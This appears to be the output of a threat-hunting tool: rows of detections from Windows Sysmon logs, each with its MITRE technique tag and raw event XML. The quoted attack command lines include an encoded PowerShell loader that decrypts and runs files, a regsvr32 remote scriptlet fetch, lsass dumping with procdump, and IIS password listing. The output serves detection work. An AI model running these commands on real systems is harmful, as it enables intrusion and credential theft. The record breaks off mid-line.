JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1086] PowerShell Process found,1555606584.893827,2019-04-18T20:56:24.893827+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( Powershell ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 13 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1086,technique_name=PowerShell + 2019-04-18 16:56:08.340 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows PowerShell + Microsoft® Windows® Operating System + Microsoft Corporation + Powershell + C:\Users\IEUser\Desktop\ + IEWIN7\IEUser + 365ABB72-AB27-5CB8-0000-002021CA0000 + 0xca21 + 1 + High + SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C + 365ABB72-AC01-5CB8-0000-0010BB7E0700 + 1196 + C:\Windows\System32\cmd.exe + "cmd.exe" /s /k pushd "C:\Users\IEUser\Desktop" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\regsvr32.exe) with commandline ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 18851 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-18 17:51:14.254 + 365ABB72-4612-5CE0-0000-00103D1E2600 + 2600 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-433D-5CE0-0000-002031350100 + 0x13531 + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-433C-5CE0-0000-00100FD20000 + 964 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Regsvr32,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 18851 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-18 17:51:14.254 + 365ABB72-4612-5CE0-0000-00103D1E2600 + 2600 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-433D-5CE0-0000-002031350100 + 0x13531 + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-433C-5CE0-0000-00100FD20000 + 964 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\regsvr32.exe ) through command line ( /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 18851 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-18 17:51:14.254 + 365ABB72-4612-5CE0-0000-00103D1E2600 + 2600 + C:\Windows\System32\regsvr32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Microsoft(C) Register Server + Microsoft® Windows® Operating System + Microsoft Corporation + /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-433D-5CE0-0000-002031350100 + 0x13531 + 1 + Medium + SHA1=A774A816662FF5B75669AA5BCE751BAB9D0972B8,MD5=432BE6CF7311062633459EEF6B242FB5,SHA256=890C1734ED1EF6B2422A9B21D6205CF91E014ADD8A7F41AA5A294FCF60631A7B,IMPHASH=A2DAD36BD73280726DA578EB659D0583 + 365ABB72-433C-5CE0-0000-00100FD20000 + 964 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.891593,2019-05-27T05:29:17.891593+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5904 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.851 + 365ABB72-3D6D-5CEB-0000-0010C47BFF00 + 560 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6192 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.612 + 365ABB72-FE76-5CEB-0000-001015780C00 + 1260 + \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe + ? + ? + ? + ? + \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448 + 365ABB72-FE6C-5CEB-0000-00104A170C00 + 3680 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1558969979.519768,2019-05-27T19:12:59.519768+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe ) through command line ( \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 6192 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 15:12:54.612 + 365ABB72-FE76-5CEB-0000-001015780C00 + 1260 + \Device\HarddiskVolumeShadowCopy7\Windows\Temp\svhost64.exe + ? + ? + ? + ? + \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-7B40-5CEC-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=D2A54176D8E86788FB6D588919031FEF7594A79C,MD5=5779C26E8F7B3E2C9354436E0081DF67,SHA256=64F02345E342749D381F7DF34E23CE304B3292F97DE9ECE0FB6E9B55466ADF44,IMPHASH=481F47BBB2C9C21E108D65F52B04C448 + 365ABB72-FE6C-5CEB-0000-00104A170C00 + 3680 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1202] Indirect Command Execution,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Medium,Found User (IEWIN7\IEUser) through process name (C:\Windows\System32\pcalua.exe) tried indirect command execution through commandline ( "C:\Windows\system32\calc.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16498 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 17:01:50.852 + 365ABB72-517E-5CD8-0000-00105FE01700 + 2920 + C:\Windows\System32\calc.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows Calculator + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\system32\calc.exe" + C:\Users\IEUser\ + IEWIN7\IEUser + 365ABB72-4FB5-5CD8-0000-0020F2350100 + 0x135f2 + 1 + Medium + SHA1=9018A7D6CDBE859A430E8794E73381F77C840BE0,MD5=60B7C0FEAD45F2066E5B805A91F4F0FC,SHA256=80C10EE5F21F92F89CBC293A59D2FD4C01C7958AACAD15642558DB700943FA22,IMPHASH=F93B5D76132F6E6068946EC238813CE1 + 365ABB72-517E-5CD8-0000-001024D61700 + 2952 + C:\Windows\System32\pcalua.exe + "C:\Windows\System32\pcalua.exe" -a c:\Windows\system32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1218.005 ] Mshta found running in the system,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16396 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.592 + 365ABB72-21B8-5CD8-0000-0010E4E82600 + 2964 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T0000 ] Suspicious process name detected,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" ) contain suspicious command ( \mshta.exe),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16396 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.592 + 365ABB72-21B8-5CD8-0000-0010E4E82600 + 2964 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1170] Detecting Mshta,1557668281.383045,2019-05-12T17:38:01.383045+04:00,,Threat,High,"Found User (IEWIN7\IEUser) Trying to run mshta with Command Line ("C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta") and Parent Image :C:\Windows\System32\rundll32.exe , Parent CommandLine (rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta) in directory : ( c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16396 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:38:00.592 + 365ABB72-21B8-5CD8-0000-0010E4E82600 + 2964 + C:\Windows\System32\mshta.exe + 11.00.9600.16428 (winblue_gdr.131013-1700) + Microsoft (R) HTML Application host + Internet Explorer + Microsoft Corporation + "C:\Windows\System32\mshta.exe" "C:\programdata\calc.hta" + c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-1596-5CD8-0000-0020103A0100 + 0x13a10 + 1 + High + SHA1=D4F0397F83083E1C6FB0894187CC72AEBCF2F34F,MD5=ABDFC692D9FE43E2BA8FE6CB5A8CB95A,SHA256=949485BA939953642714AE6831D7DCB261691CAC7CBB8C1A9220333801F60820,IMPHASH=00B1859A95A316FD37DFF4210480907A + 365ABB72-21B8-5CD8-0000-0010BADE2600 + 3856 + C:\Windows\System32\rundll32.exe + rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558398907.47416,2019-05-21T04:35:07.474160+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /c test.bat ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 374 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-21 00:35:07.386 + 365ABB72-47BB-5CE3-0000-001071AD3E00 + 3944 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.exe /c test.bat + C:\Users\IEUser\Downloads\ + IEWIN7\IEUser + 365ABB72-39CC-5CE3-0000-002096C70000 + 0xc796 + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-47BB-5CE3-0000-0010BFA83E00 + 1912 + C:\Users\IEUser\Downloads\com-hijack.exe + "C:\Users\IEUser\Downloads\com-hijack.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553028075.154291,2019-03-20T00:41:15.154291+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966252 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 20:36:04.226 + 365ABB72-52B4-5C91-0000-0010D55B0100 + 1636 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-528D-5C91-0000-0020E7030000 + 0x3e7 + 0 + System + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-528D-5C91-0000-001062560000 + 484 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1003] Credential Dumping - Process Access,1552849783.932612,2019-03-17T23:09:43.932612+04:00,,Threat,High,[T1003] Credential Dumping - Process Access,10," + + + + + 10 + 3 + 4 + 10 + 0 + 0x8000000000000000 + + + 4434 + + + + + Microsoft-Windows-Sysmon/Operational + PC04.example.corp + + + + + + 2019-03-17 19:09:41.328 + 365ABB72-9B75-5C8E-0000-0010013F1200 + 1856 + 980 + C:\Users\IEUser\Desktop\procdump.exe + 365ABB72-0886-5C8F-0000-001030560000 + 476 + C:\Windows\system32\lsass.exe + 0x1fffff + C:\Windows\SYSTEM32\ntdll.dll+4595c|C:\Windows\SYSTEM32\ntdll.dll+1d4da|C:\Windows\system32\kernel32.dll+3cc47|C:\Windows\system32\kernel32.dll+3ff99|C:\Windows\system32\dbghelp.dll+4c791|C:\Windows\system32\dbghelp.dll+4dcab|C:\Windows\system32\dbghelp.dll+4a1b8|C:\Windows\system32\dbghelp.dll+45b81|C:\Windows\system32\dbghelp.dll+45e2a|C:\Users\IEUser\Desktop\procdump.exe+11a8d|C:\Users\IEUser\Desktop\procdump.exe+116a6|C:\Users\IEUser\Desktop\procdump.exe+11610|C:\Users\IEUser\Desktop\procdump.exe+11356|C:\Windows\system32\kernel32.dll+4ef8c|C:\Windows\SYSTEM32\ntdll.dll+6367a|C:\Windows\SYSTEM32\ntdll.dll+6364d + +",PC04.example.corp,Microsoft-Windows-Sysmon/Operational +[ T1059 ] wscript or cscript runing script,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line ("c:\windows\system32\wscript.exe" /E:vbs c:\windows\temp\icon.ico "powershell -exec bypass -c ""IEX 